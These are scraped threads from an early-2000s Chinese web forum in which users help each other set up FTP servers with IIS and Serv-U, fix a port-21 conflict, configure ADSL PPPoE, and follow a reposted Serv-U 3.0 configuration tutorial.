 发表于 2002-01-24 19:15:49 按此观看阿修罗飞天舞的个人资料 按此发邮件给阿修罗飞天舞 阿修罗飞天舞 的 oicq 是5194599,查看 5194599 的资料 发送悄悄话给阿修罗飞天舞 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看阿修罗飞天舞的IP
过雪无痕在上个帖子中说
引用:
其实我不想依靠什么软件来假设FTP服务器。我想通过系统自带的IIS或PWS来完成。不知道能否架设。请指教。

你的IP地址是固定的吗？

坐看秋草只须臾 秋夕惊鸿往日情 不忍萧瑟枯原景 思思念念无日月
随风散去荻上露 薄暮伤别彷若梦 秋日难留故人心 今年今生今日尽

Blueidea Web Team

过雪无痕

高级用户
积分：223
发帖：65
来自：
注册：2001-12-03
 发表于 2002-01-24 19:17:01 按此观看过雪无痕的个人资料 按此发邮件给过雪无痕 访问过雪无痕的主页 过雪无痕 的 oicq 是35865183,查看 35865183 的资料 发送悄悄话给过雪无痕 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看过雪无痕的IP
我是电话线上网，IP不能固定。

虽然我很笨！但是我好学。望多多指教！谢谢：） http://go3.163.com/tomjon
阿修罗飞天舞

无关风月
现任版主
积分：2516
发帖：2473
来自：杭州
注册：2001-05-21
 发表于 2002-01-24 19:19:26 按此观看阿修罗飞天舞的个人资料 按此发邮件给阿修罗飞天舞 阿修罗飞天舞 的 oicq 是5194599,查看 5194599 的资料 发送悄悄话给阿修罗飞天舞 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看阿修罗飞天舞的IP
那么你用自己的IIS架设很不科学，你不是每次都要更换IP地址？
你不烦死下载的人先烦死了，^_^

坐看秋草只须臾 秋夕惊鸿往日情 不忍萧瑟枯原景 思思念念无日月
随风散去荻上露 薄暮伤别彷若梦 秋日难留故人心 今年今生今日尽

Blueidea Web Team

过雪无痕

高级用户
积分：223
发帖：65
来自：
注册：2001-12-03
 发表于 2002-01-24 19:44:53 按此观看过雪无痕的个人资料 按此发邮件给过雪无痕 访问过雪无痕的主页 过雪无痕 的 oicq 是35865183,查看 35865183 的资料 发送悄悄话给过雪无痕 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看过雪无痕的IP
那你的意思是。我只有用软件了。那用软件就没有这样的问题发生吗？

虽然我很笨！但是我好学。望多多指教！谢谢：） http://go3.163.com/tomjon
2smile

活着就好
积分：1811
发帖：2105
来自：SD
注册：2001-05-13
 发表于 2002-01-24 19:58:53 按此观看2smile的个人资料 按此发邮件给2smile 访问2smile的主页 发送悄悄话给2smile 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看2smile的IP
是的，先安装dns2go client，就可以随时把你申请的域名解析到你的IP
然后安装serv-u就可以了。

想见不如怀念?
thinktip.com
msn: thinktip@hotmail.com
icq: 98885338
过雪无痕

高级用户
积分：223
发帖：65
来自：
注册：2001-12-03
 发表于 2002-01-24 20:02:42 按此观看过雪无痕的个人资料 按此发邮件给过雪无痕 访问过雪无痕的主页 过雪无痕 的 oicq 是35865183,查看 35865183 的资料 发送悄悄话给过雪无痕 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看过雪无痕的IP
我不知道那是什么软件，那里能下载到。

虽然我很笨！但是我好学。望多多指教！谢谢：） http://go3.163.com/tomjon
2smile

活着就好
积分：1811
发帖：2105
来自：SD
注册：2001-05-13
 发表于 2002-01-24 20:07:18 按此观看2smile的个人资料 按此发邮件给2smile 访问2smile的主页 发送悄悄话给2smile 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看2smile的IP
http://www.deerfield.com/download/dns2go/

下载安装后，点Registeration，然后点Registeration domain..，一步一步注册完后，系统便会自动把注册域名与CD-Key输入。这时候便可以启动了。

接下来要做的便是设置serv-u，架ftp了。

想见不如怀念?
thinktip.com
msn: thinktip@hotmail.com
icq: 98885338
过雪无痕

高级用户
积分：223
发帖：65
来自：
注册：2001-12-03
 发表于 2002-01-24 20:19:48 按此观看过雪无痕的个人资料 按此发邮件给过雪无痕 访问过雪无痕的主页 过雪无痕 的 oicq 是35865183,查看 35865183 的资料 发送悄悄话给过雪无痕 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看过雪无痕的IP
能否与你在QQ上说。这样太慢了。可以么？我的号码是 35865183

虽然我很笨！但是我好学。望多多指教！谢谢：） http://go3.163.com/tomjon
过雪无痕

高级用户
积分：223
发帖：65
来自：
注册：2001-12-03
 发表于 2002-01-24 20:27:55 按此观看过雪无痕的个人资料 按此发邮件给过雪无痕 访问过雪无痕的主页 过雪无痕 的 oicq 是35865183,查看 35865183 的资料 发送悄悄话给过雪无痕 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看过雪无痕的IP
我连接服务器老是超时，你给我说句话吧！

虽然我很笨！但是我好学。望多多指教！谢谢：） http://go3.163.com/tomjon
arrive

终级用户
积分：1298
发帖：433
来自：大连
注册：2000-12-02
 发表于 2002-01-24 20:57:13 按此观看arrive的个人资料 按此发邮件给arrive 访问arrive的主页 arrive 的 oicq 是7902765,查看 7902765 的资料 发送悄悄话给arrive 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看arrive的IP
这周的电脑报上有这个文章!

Нельзя выпустить из руквозможностъ,которая случается в жизнь.
中国坛中文网——网络技术版www.chinafen.com
过雪无痕

高级用户
积分：223
发帖：65
来自：
注册：2001-12-03
 发表于 2002-01-24 21:03:04 按此观看过雪无痕的个人资料 按此发邮件给过雪无痕 访问过雪无痕的主页 过雪无痕 的 oicq 是35865183,查看 35865183 的资料 发送悄悄话给过雪无痕 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看过雪无痕的IP
我没有买呀！：（！

虽然我很笨！但是我好学。望多多指教！谢谢：） http://go3.163.com/tomjon
忧郁蓝蝴蝶

终级用户
积分：3647
发帖：941
来自：
注册：2001-09-23
 发表于 2002-01-24 21:26:22 按此观看忧郁蓝蝴蝶的个人资料 按此发邮件给忧郁蓝蝴蝶 访问忧郁蓝蝴蝶的主页 发送悄悄话给忧郁蓝蝴蝶 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看忧郁蓝蝴蝶的IP
我的问题出在dns2go上，真是滑天下之大稽

I love hate
I hate love
过雪无痕

高级用户
积分：223
发帖：65
来自：
注册：2001-12-03
 发表于 2002-01-25 21:54:28 按此观看过雪无痕的个人资料 按此发邮件给过雪无痕 访问过雪无痕的主页 过雪无痕 的 oicq 是35865183,查看 35865183 的资料 发送悄悄话给过雪无痕 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看过雪无痕的IP
哈哈!

虽然我很笨！但是我好学。望多多指教！谢谢：） http://go3.163.com/tomjon
上一贴 | 下一贴
快速回复 主题：FTP个人服务器
显示名字： 啸 [ 退出 ]
消息图标：

内容
* HTML 代码关闭
* UBB　代码开启
* 笑脸转换一点通

* html代码调试方法:
[html]……[/html]
显示签名 禁止笑脸转换

管理选项： 关闭主题 | 置于顶部 | 移动/归档 | 删除主题

跳转到:

经典论坛 PS版与艺设版 联合举办 『设计四连击』 设计接龙


用Serv-U FTP 遇到的问题 - 经 典 论 坛

计算机技术
用Serv-U FTP 遇到的问题

上一贴 | 下一贴
发表人 主题: 用Serv-U FTP 遇到的问题
傻看着你

超级用户
积分：417
发帖：132
来自：
注册：2001-11-29
 发表于 2002-01-25 17:56:38 按此观看傻看着你的个人资料 按此发邮件给傻看着你 收藏该主题供以后查看 发送悄悄话给傻看着你 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看傻看着你的IP
我按照教程中的配置设置好了域和用户，然后尝试用cute-ftp登陆本地的服务器，ip 就是
127.0.0.1，但是却始终不可以，在域日志里显示：SERVER IS NOT LISTENING: Port number 21 is already in use!

怎么回事？不是设置端口为默认的21吗？

DayinNightout

超级用户
积分：345
发帖：152
来自：CCF
注册：2000-12-18
 发表于 2002-01-25 19:16:57 按此观看DayinNightout的个人资料 按此发邮件给DayinNightout 发送悄悄话给DayinNightout 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看DayinNightout的IP
serv-u 默认的 LocalServer 也是127.0.0.1:43958

你有新建一个 Domains 吗

木有签名#@$%
傻看着你

超级用户
积分：417
发帖：132
来自：
注册：2001-11-29
 发表于 2002-01-25 20:18:27 按此观看傻看着你的个人资料 按此发邮件给傻看着你 发送悄悄话给傻看着你 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看傻看着你的IP
对呀，我是在本地服务器下新建了一个域，然后新建了一个用户？这样有错吗？帮帮忙，我弄了一天了，谢谢你
傻看着你

超级用户
积分：417
发帖：132
来自：
注册：2001-11-29
 发表于 2002-01-25 20:31:47 按此观看傻看着你的个人资料 按此发邮件给傻看着你 发送悄悄话给傻看着你 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看傻看着你的IP
看看吧，大概是这样，把域ip地址改成127.0.0.1也没有用
2smile

活着就好
积分：1811
发帖：2105
来自：SD
注册：2001-05-13
 发表于 2002-01-25 21:44:06 按此观看2smile的个人资料 按此发邮件给2smile 访问2smile的主页 发送悄悄话给2smile 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看2smile的IP
是不是开启了iiis的ftp服务器？把这个关了先

想见不如怀念?
thinktip.com
msn: thinktip@hotmail.com
icq: 98885338
傻看着你

超级用户
积分：417
发帖：132
来自：
注册：2001-11-29
 发表于 2002-01-25 22:05:00 按此观看傻看着你的个人资料 按此发邮件给傻看着你 发送悄悄话给傻看着你 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看傻看着你的IP
能不能教教我怎么关？
傻看着你

超级用户
积分：417
发帖：132
来自：
注册：2001-11-29
 发表于 2002-01-25 22:13:30 按此观看傻看着你的个人资料 按此发邮件给傻看着你 发送悄悄话给傻看着你 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看傻看着你的IP
是这样的，我发现是IIS的问题，可是我点断开，没有用呀
kirsten9

终级用户
积分：532
发帖：174
来自：冷冷的山脊
注册：2001-07-13
 发表于 2002-01-25 23:41:40 按此观看kirsten9的个人资料 该用户不允许显示它的电子邮件 访问kirsten9的主页 kirsten9 的 oicq 是18348795,查看 18348795 的资料 发送悄悄话给kirsten9 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看kirsten9的IP
看看21端口被什么程序占用？

{ KUka ALl wAYs wITh yOU }
傻看着你

超级用户
积分：417
发帖：132
来自：
注册：2001-11-29
 发表于 2002-01-25 23:59:10 按此观看傻看着你的个人资料 按此发邮件给傻看着你 发送悄悄话给傻看着你 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看傻看着你的IP
别笑我，我不知道怎么看，但你告诉我，我一定会照做
2smile

活着就好
积分：1811
发帖：2105
来自：SD
注册：2001-05-13
 发表于 2002-01-26 09:01:08 按此观看2smile的个人资料 按此发邮件给2smile 访问2smile的主页 发送悄悄话给2smile 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看2smile的IP
先换一个端口试试

想见不如怀念?
thinktip.com
msn: thinktip@hotmail.com
icq: 98885338
傻看着你

超级用户
积分：417
发帖：132
来自：
注册：2001-11-29
 发表于 2002-01-26 11:10:58 按此观看傻看着你的个人资料 按此发邮件给傻看着你 发送悄悄话给傻看着你 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看傻看着你的IP
我把iis服务删除，问题解决了
上一贴 | 下一贴
快速回复 主题：用Serv-U FTP 遇到的问题
显示名字： 啸 [ 退出 ]
消息图标：

内容
* HTML 代码关闭
* UBB　代码开启
* 笑脸转换一点通

* html代码调试方法:
[html]……[/html]
显示签名 禁止笑脸转换

管理选项： 关闭主题 | 置于顶部 | 移动/归档 | 删除主题

跳转到:

dreamweaver MX 功能探索


请教adsl的配置问题！ - 经 典 论 坛

计算机技术
请教adsl的配置问题！

上一贴 | 下一贴
发表人 | 主题: 请教adsl的配置问题！
傻看着你 超级用户 积分：417 发帖：132 来自： 注册：2001-11-29 | 发表于 2002-01-27 13:35:08 按此观看傻看着你的个人资料 按此发邮件给傻看着你 收藏该主题供以后查看 发送悄悄话给傻看着你 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看傻看着你的IP 我在家等电信等得不耐烦了，听说交了钱线路就通了，我想自己试着配置一下，设备装好了，可是不会用。教教我
阿修罗飞天舞 无关风月 现任版主 积分：2516 发帖：2473 来自：杭州 注册：2001-05-21 | 发表于 2002-01-27 14:00:12 按此观看阿修罗飞天舞的个人资料 按此发邮件给阿修罗飞天舞 阿修罗飞天舞 的 oicq 是5194599,查看 5194599 的资料 发送悄悄话给阿修罗飞天舞 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看阿修罗飞天舞的IP 安装PPPOE的协议 网上邻居——属性——添加协议——PPPOE（电信的人应该给你，不然也有地方到处可以下的，比如电信的专门站点） 重新启动——或者不愿意启动就到设备管理器里去修改一下网卡的属性，启用栏的勾去掉再勾上就可以了 安装pppoe中的win32程序pppoe，然后得到一个对话框，记得要保证网线插好，adsl调制解调器联机的状态下，然后寻找服务，得到当地的服务虚拟拨号程序 然后拨号就可以了 坐看秋草只须臾 秋夕惊鸿往日情 不忍萧瑟枯原景 思思念念无日月 随风散去荻上露 薄暮伤别彷若梦 秋日难留故人心 今年今生今日尽 Blueidea Web Team
上一贴 | 下一贴
快速回复 主题：请教adsl的配置问题！
显示名字： 啸 [ 退出 ]
消息图标：

内容
* HTML 代码关闭
* UBB　代码开启
* 笑脸转换一点通

* html代码调试方法:
[html]……[/html]
显示签名 禁止笑脸转换

管理选项： 关闭主题 | 置于顶部 | 移动/归档 | 删除主题

跳转到:

经典论坛 PS版与艺设版 联合举办 『设计四连击』 设计接龙


什么是缓存加速服务,负载均衡服务？ - 经 典 论 坛

dreamweaver MX 功能探索

计算机技术
什么是缓存加速服务,负载均衡服务？

上一贴 | 下一贴
发表人 | 主题: 什么是缓存加速服务,负载均衡服务？
ajiao 终级用户 积分：575 发帖：182 来自：0412 注册：2001-03-14 | 发表于 2002-01-09 08:27:15 按此观看ajiao的个人资料 按此发邮件给ajiao ajiao 的 oicq 是870922,查看 870922 的资料 收藏该主题供以后查看 发送悄悄话给ajiao 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看ajiao的IP 我不是很了解，领导还想让我操作，请帮我看看哪里有很好的资料，解释解释，谢谢。 到底有没有无需置疑的事情呢？
yunbin 经典强盗 现任版主 积分：2397 发帖：1033 来自：火星 注册：2001-09-27 | 发表于 2002-01-09 11:03:51 按此观看yunbin的个人资料 按此发邮件给yunbin 访问yunbin的主页 yunbin 的 oicq 是2369009,查看 2369009 的资料 发送悄悄话给yunbin 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看yunbin的IP 缓存加速服务针对数据中心所有存在WWW应用的用户提供高速缓存服务，从而加快HTTP请求的响应速度，并且减轻后台WWW服务器的负载 负载均衡指的是采用智能交换机对用户的请求进行分析，并指向最佳的服务器。由于采用这种分布式结构，网站性能和可靠性可以得到提高，从而提高客户对网站体验的满意度 http://www.ccidnet.com/tech/hard/2001/04/29/58_2092.html [这消息被yunbin编辑过(编辑时间2002-01-09 11:05:37)] A man can succeed at almost anything for which he has unlimited enthusiasm. Blueidea Web Team Moderator Of Computer Technology Forum
上一贴 | 下一贴
快速回复 主题：什么是缓存加速服务,负载均衡服务？
显示名字： 啸 [ 退出 ]
消息图标：

内容
* HTML 代码关闭
* UBB　代码开启
* 笑脸转换一点通

* html代码调试方法:
[html]……[/html]


如何在局域网里架设自己的ftp服务器？ - 经 典 论 坛

dreamweaver MX 功能探索

计算机技术
如何在局域网里架设自己的ftp服务器？

上一贴 | 下一贴
发表人 主题: 如何在局域网里架设自己的ftp服务器？
hedgehog

终级用户
积分：862
发帖：381
来自：
注册：2000-08-24
 发表于 2002-01-06 14:40:09 按此观看hedgehog的个人资料 该用户不允许显示它的电子邮件 收藏该主题供以后查看 发送悄悄话给hedgehog 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看hedgehog的IP
所有电脑都通过服务器上网，服务器有固定IP。

用哪个软件可以开ftp？我用的是serve-u 3.0这个软件，好像有些问题。

什么是爱情？给我一次体验的机会...
凌志

终级用户
积分：544
发帖：166
来自：鞍山
注册：2001-01-09
 发表于 2002-01-06 14:41:57 按此观看凌志的个人资料 按此发邮件给凌志 访问凌志的主页 凌志 的 oicq 是5685200,查看 5685200 的资料 发送悄悄话给凌志 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看凌志的IP
推荐Win2000 Server中的IIS 5.0！

网络天下
四海一家
Bee007

高级用户
积分：193
发帖：223
来自：
注册：2000-02-01
 发表于 2002-01-06 15:33:25 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent
如果你的机器只分配了内部ip，如 192.xxx.xxx.xxx 之类的，就不行了。
张无忌

win1st
管理员
积分：7152
发帖：3115
来自：Blueidea.com
注册：2000-09-10
 发表于 2002-01-06 16:51:19 按此观看张无忌的个人资料 按此发邮件给张无忌 访问张无忌的主页 发送悄悄话给张无忌 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看张无忌的IP
要求不高的话，就iis吧
servr-u不要用汉化版本的

态度决定一切

Blueidea Web Team
Team Member

Fly

Developer
积分：4146
发帖：1028
来自：
注册：2001-10-31
 发表于 2002-01-06 17:12:07 按此观看Fly的个人资料 按此发邮件给Fly Fly 的 oicq 是7969660,查看 7969660 的资料 发送悄悄话给Fly 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看Fly的IP
做下载,还是做上传呀,要是做上传的话,IIS可不怎么好用,做下载的话,还不如用HTTP

我的虚荣心是用十句话说出别人用一本书讲出的东西和别人用一本书没有讲出的东西.
----尼采

2smile

活着就好
积分：1811
发帖：2105
来自：SD
注册：2001-05-13
 发表于 2002-01-06 18:16:14 按此观看2smile的个人资料 按此发邮件给2smile 访问2smile的主页 发送悄悄话给2smile 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看2smile的IP
当然用serve-u,转帖一个给你看:

首先你必须具备的条件：
1：你必须具有网管权限
2：主服务器操作系统是WIN2K。
下载一个FTP服务端软件，FTP serv-u(本机上如果装了ＩＩＳ也可以），完成安装。
下面是在服务器（也就是局域网代理服务器）上要做的工作，以保证你的ＦＴＰ可以对外服务。
一,建产ＤＮＳ记录
1、打开DNS控制台：选“开始菜单→程序→管理工具→DNS”。
２，建立域名“ftp.dasha.com”映射IP地址“192.168.0.50”(这个ＩＰ就是客户端的真
  正ＩＰ）的主机记录。
①建立“com”区域：选“DNS→WY（你的服务器名）→正向搜索区域→右键→新建区域”，然后根据提示选“标准主要区域”、在“名称”处输入“com“
②建立“dasha”域：选“com→右键→新建域”，在“键入新域名”处输入“dasha”
③建立“ftp”主机。选“dasha→右键→新建主机”，“名称”处为“ftp”，“IP地址”处输入“192.168.0.50”，再按“添加主机”。
现在测试一下，“运行”输入"ping ftp.dasha.com"
二、“ftp.abc.com”的设置
1、打开“默认FTP站点”属性窗口：选“默认FTP站点→右键→属性”即可。
2、设置“FTP站点”：在“IP地址”处选“192.168.0.50”，端口号保持默认值“21”不变。
3、设置“消息”：在“欢迎”框中输入登录成功后的欢迎信息，“退出”中为退出信息。
4、设置“主目录”：在“客户机”中按“浏览”按钮选择目标目录“E:\myweb”。
5、设置“安全帐号”：默认的，匿名用户（Anonymous）被允许登录，如果有必要，此处可选拒绝其登录以增加安全性；或增加其他用于管理此FTP服务器的用户名（默认的为“Administator”）。
6、设置“目录安全性”：此处可以设置只被允许或只被拒绝登录此FTP服务器的的计算机的IP地址。
7、如需要，也可在“默认FTP站点”处单击右键选“新建”来新建FTP的虚拟目录。
三、“ftp.dasha.com”的测试
  1、在浏览器中登录：格式为“ftp://ftp.dasha.com”或“ftp://用户@ftp.abc.com”。如果匿名用户被允许登录，则第一种格式就会使用匿名登录的方式；如果匿名不被允许，则会弹出选项窗口，供输入用户名和密码。第二种格式可以直接指定用某个用户名进行登录。
2、在DOS下登录：格式为“ftp ftp.abc.com”。
3、用FTP客户端软件登录
4、如果“主目录”下有与用户同名的“虚拟目录”或“实际目录”，则该用户会直接登录到其同名目录中。
注意第二部的工作，你还可以填加另一个ＦＴＰ站点，不过之前，你还得进行第一步的工作。
三，开始客户端的ＦＴＰ服务器软件设置。
下边的工作便是serve-u的设置了，再转一个:
Serv-U 3.0.0.17 使用详解 (转贴)

主要新功能:
* 以 WindowsNT/2000/XP... 的 Service 形式运行, 可以随开机而启动服务
* 把服务器和管理工具分离, 而管理工具可以远程配置 Serv-U 3 的服务器
* 虚拟路径映射 (Virtual path mappings), 可以很方便地把不同分区, 甚至
不同机器上的路径都映射到你想它出现的位置, 对于登录用户来说, 他根本
看不出虚拟映射和实际有什么分别
* 似乎对 DoS (Deny Of Service) 攻击有点对策, 实际应用情况不清楚

主要特性:
* 看来内存比 2.x 占用得多不了多少 (当管理工具没打开时)
* 至少不会比 2.x 慢
* 注册码有点难度, 竟然出了几天都没注册机
更有cracker说它用了 ECC (Elliptic Curves) , 很可能永远都出不了注册机?
现在有的是破解版, 可能有人感觉不太舒服吧?

综上所述, 对于 2.x 的用户来说, 如果没用到主要的新功能, 不换也没什么不好,
但如果想换又不知如何配置, 请看下回分解~~~
原文再续书接上一回, 话说上次说到对于想升级又怕不会用的人, 你可以放心了,
你只要保留你原本 2.x, 升级安装上去, Serv-U 3 就会自动按原设定配置服务器,
根本不用你动手, 所以, 这篇基本上是废话...

欲知重头安装该怎样做, 或想知各种功能的用法, 请看下回分解!
Step #1. 安装
点击安装程序, 直点 Next 就完成了. 没什么好说的.

Step #2. 第一次运行
安装完成后, 服务器的Service会启动, 管理工具会自动运行, 你看到的, 是要你
配置好它的 Setup Wizard... 唔... 基本上 Next 下去就是了, 下面几个可能你
会有兴趣:
Domain name: 域的名字
Allow anonymous access: 要让匿名登录吗? (选 No 可以跳过这部分)
Annoymous home directory: 匿名登录后, 用户会看到的目录
Lock annoymous users into their home directory: 选Yes, 不要让他们乱跑
Create named account: 要建立有非匿名用户吗?
输入用户名, 密码.
(大约和上面过程一样)
Account admin priviledge: 这个用户有远程管理 Serv-U 3 的权限吗?
呵呵. 通常选 No priviledge 吧.
嘿! 基本上搞好了!

Step #3. 认识 Serv-U 3 管理工具的的界面
左边的树状结构是 Serv-U 3 的结构层次:
1. Serv-U Server 下面是管理工具在管理的 FTP,
其中<<Local Server>>就是你机上那个服务器了.

2. 在每个服务器中...
License: 给你填注册码
Settings: 服务器总配置
Activity: 给你监测本服务器的运作情况
Domains: 下面的各个 Domain, 是以你的机器拥有的不同IP开的服务器,
按刚才"第一次运行"来做, 你现在会有一个 Domain 了.

Step #4: 整体配置
在<<Local Server>>的Settings:

General: 总体限制, 参数设置
Max. Speed- 总体限速,
不设的话, 极速可达约 1MBytes/S.
Max no. of users - 同时的连接数目
不要太多, 很伤硬盘的, 建议不超过20
Check Anonymous password - 匿名登陆密码检查,
不要选, 否则 IE 不能进入.
Block Anti Time-out schemes
Block "FTP_bounce"...
主要是把些无聊人赶掉, 都选吧, 细节看 Help
Block users who connect...
随意, 用于"罚"一下用多线程下载的用户.
其馀选项看 Help 吧.

Dir Cache: 目录缓存
用户较多时, 可以明显加快用户浏览的速度,
把它打开, 用默认的 Max.Size 25, Time-out 600 sec. 差不多了.
Auto-Refresh 选取后你会看到在缓存中有哪些目录

Advanced:
Server:
Enable security - 安全设置生效
一定要选上! 否则你会死得很难看. KAKAKA
Sockets:
Inline out-of-band data
选取后听说可以防止 DoS 攻击, 但默认没选, 你自己决定吧.

至于如何配置用户, 就请看下回分解!
原文再续书接上一回, 话说上次说到我们有了个服务器,
但没设好域里的用户, 也是没用的, 所以...

Step #1: 域 (Domain) 配置
在 Domains 下选取你的域吧!
Name: 域的名字
Domain IP address: 为简单起见, "Use any available IP address" 算了吧.
Domain type:
Store in .INI file 比较好,
它把你的服务器的设置都放到 ServUDaemon.ini ,
重装系统后把这文件放上去就行了.
FTP port number:
通常是 21

Settings:
General:
Max no. of users - 同时的连接数目
和上一个差不多, 不过是在域里限制
Virtual path mapping - 请看 VPM 篇
Links - 同上
Messages:
很好玩的, 可以把别人登录看到的信息都改掉.
Logging:
就是 log 啊. 不懂? 看 help!

Step #2: 用户帐号
在 Domains 下...
Users... 右击出现新增/移除用户选单.

点选任一用户后, 各项用户参数意义:

Account:
Disable account: 暂时令它失效
Automatically remove account on date: 到了某日期就删掉该用户! (爽!)
User name: 不用多说吧?
Password: 留空不填代表不用密码
Home directory: 这用户登录时看到的第 1 个目录
Lock user in home directory:
最如想在用这帐号登陆后, 看到的根目录是所设的 Home Directory,
就选吧. (建议选取, 否则地址会比较难看)
Priviledge: 这用户远程管理 Serv-U 服务器的权限, 具体看 HELP

General:
Allow only N login(s) from same IP address
限制同一 IP 用这帐号的连接数, 选了它吧!
如果考虑到用 IE 的用户, 最好设两个连接,
否则对方可能不能下载, 如果狠心点, 设 1 个也没关系!
Max upload Speed.
用这帐号, 每一个连接上传文件的极速.
Max download Speed
用这帐号, 每一个连接下载的极速.
Idle time-out
发呆多久才 kick 他出去, 个人认为 5 分钟都够了.
Sesson time-out
无论他有没有发呆, 上来一段时间后就把他 KICK 走, 即使他在下载
什么东东也照踢不误, 并且在 1 分钟内不让他再上来. 这样在很忙下载
站点中可能有用, 可以让多点人有机会访问, 不过确是有点讨厌. 呵呵
Max. no. of users
这帐号同时允许的总连接数目.
其馀的比较少用, 看 HELP 吧.
Dir Access:
这里设置这用户对你硬盘中, 实际路径的读写权限, 关键哦!
无论是 HOME 目录好, 映射目录也罢. 要让用户用得到, 也要在这里加
具体意义在界面上也很明确吧. 不多说了, 但别忘了.
(记得把 HOME 目录在这里加多一次, files-[read], directories-[list]
这样人家看能看到, 下载到你的东东....)

Step #3: 群组帐号
在 Domains 下...
Groups... 右击出现新增/移除用户选单.

看上去很简单是不是? 对了. 把一个 Group 设置了一点参数,
在任一用户 - Account - Group(s) 中把他加进去, 他就拥有那个参数的权限.
有什么用? 你自己想想吧.

哈哈... 基本上我们都搞好了, 但是重头戏 Virtual path mappings 还没出场,
到底这东东有什么用处, 又是什么设置的呢? 请看下回分解!

原文再续书接上一回, 话说上次说到 Virtal path mappings 就打住不说,
究竟是什么原因呢? 这是因为很多老鸟都对上面几篇一屑不顾, 但却往往
死在 VPM 手上, 但是死在 VPM 的石榴裙下也甘心了. 呵呵....

在 Domains 下...
Settings:
General:
Virtual path mappings:

Step #1: 虚拟路径映射的概念:
1. Physical path: 目录的实际路径
可以是任何Windows分区上任何东东, 甚至网络邻居里的也可以
2. Mapped to: 映射到... (这个目录必须实际存在)
你想把它"变到"你硬盘里的那个目录呢?
你可以用到两个变量:
%HOME% : 即"Home directory"
%USER% : 用户名
3. mapped path name:
这个虚拟目录在显示出来的名字
4. 记得要在各用户的 Dir access 中设置它对实际路径的权限哦!!!!

Step #2: 举例:
1. 你想把 f:\movie\ 映射到匿名登录后看到的 \MyMovie 目录:
Physical path: f:\movie\
Mapped to: %HOME%
mapped path name: MyMovie
在 anonymous 帐号对 f:\movie\ 设 file - read, dir - list 权限
2. 你想把 g:\mp3\ 映射到 alex 登录后看到的 \Audio\MySongs 目录:
Physical path: g:\mp3\
Mapped to: %HOME%\Audio
mapped path name: MySongs
在 alex 帐号对 g:\mp3\ 设 file - read, dir - list 权限

哈哈. 还有封人的方法没说吧? 欲知后事如何, 请看下回分解!
关于多级目录映射的补充。。 来自fiend-smth
有点混乱。。嘿嘿

原文再续书接上一回, 封人对于很多人来说都是很过瘾的事,
所以就有这篇东东了...

Step #1. 按 IP 封
在 Serv-U 中, IP Access 很多地方都有出现, 这就是限制 IP 访问的地方了.
Domain- Settings 里有; 各用户- Settings 里有; 各群组- Settings 里也有.
IP access:
如果要限制 IP, 就在这里设置. 限制是由上到下执行检查的.
这里给出一些例子: (!注意次序!)
